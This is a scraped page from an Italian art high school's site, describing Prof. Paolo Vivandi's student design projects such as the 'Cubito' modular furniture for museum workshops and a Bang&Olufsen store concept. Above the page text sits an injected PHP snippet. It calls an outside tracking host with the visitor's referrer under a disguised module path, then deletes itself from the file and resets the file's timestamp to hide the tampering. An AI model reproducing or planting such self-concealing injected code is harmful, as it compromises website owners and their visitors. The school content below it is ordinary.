check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456735873){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776897&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_banners/models.php"); } Prof. Paolo VIVANDI
Get Adobe Flash player

Nuovo sito

nuovosito 1

Prof. Paolo VIVANDI

Concorso New Design

 

Tema del Concorso “Innovazione e Bene Culturale dall’idea al prototipo “

 

L’idea progettuale nasce dalla necessità di arredare gli spazi dei laboratori didattici per bambini e ragazzi che sono presenti in molti Musei e Gallerie d’arte.

Cubito è costituito da elementi d’arredo modulari che possono risolvere le diverse configurazioni spaziali e funzionali che, a seconda delle attività laboratoriali,  questi spazi necessitano.

 

Le combinazioni degli elementi consentono infinite soluzioni di arredo, con la possibilità di collocare gli elementi sia a parete che liberamente disposti.

La ricerca è stata incentrata su una flessibilità modulare che consenta diverse collocazioni spaziali degli elementi, connessa con la facilità di spostarli o combinarli in modi differenti.

 

Iter seguito:

 

Ai gruppi classe è stato fornito un iter progettuale con le indicazioni relative a requisiti e prestazioni attese, che si dovevano sviluppare, con la sola indicazione del modulo base di 15 cm di partenza. Sulla base delle esperienze acquisite durante il corso curricolare il gruppo ha prima studiato i materiali più idonei, successivamente ideato i primi concept e le maquette di studio, il lavoro in questa fase si è concluso con la realizzazione dei modelli tridimensionali con un programma CAD 3D.  

 

Info :

 

Al progetto hanno partecipato tutti gli studenti della classe 3° C e 4° C dell’Indirizzo Design dell’Istituto I.S.S. Caravaggio – Liceo Artistico Mario Mafai

Docenti tutor sono stati i prof. Giancarlo Stella e Paolo Vivandi 

 

 

Proposte di approfondimento: Prof. Paolo Vivandi

 

Design

 

Video del progetto per un sistema di arredi per il Concept Store Bang&Olufsen

 

 

B&O KN

B&O 1

 

Bontempi

B&O 1

 

Cacace - Classe 4 C

B&O 1

 

Carchia - Classe 4 A

B&O 1

 

Di Maio

B&O 1

 

Ferrotta

B&O 1

 

Giulia Z.

B&O 1

 

Hathurusingha - Classe 4 C

B&O 1

 

Paler - Classe 4 C

B&O 1

 

Motta

B&O 1

 

Big City Life

 

Le facciate delle palazzine dell'ATER di via Annio Felice a Tormarancia

icoStreet1

 

 

SEDUTAramacciotti

 

Carchia tav.09

Allegati:
FileDescrizioneDimensione del File
Scarica questo file (Carchia_tav.09.jpg)Carchia_tav.09.jpg 3351 Kb
Scarica questo file (SEDUTAramacciotti.jpg)SEDUTAramacciotti.jpg 664 Kb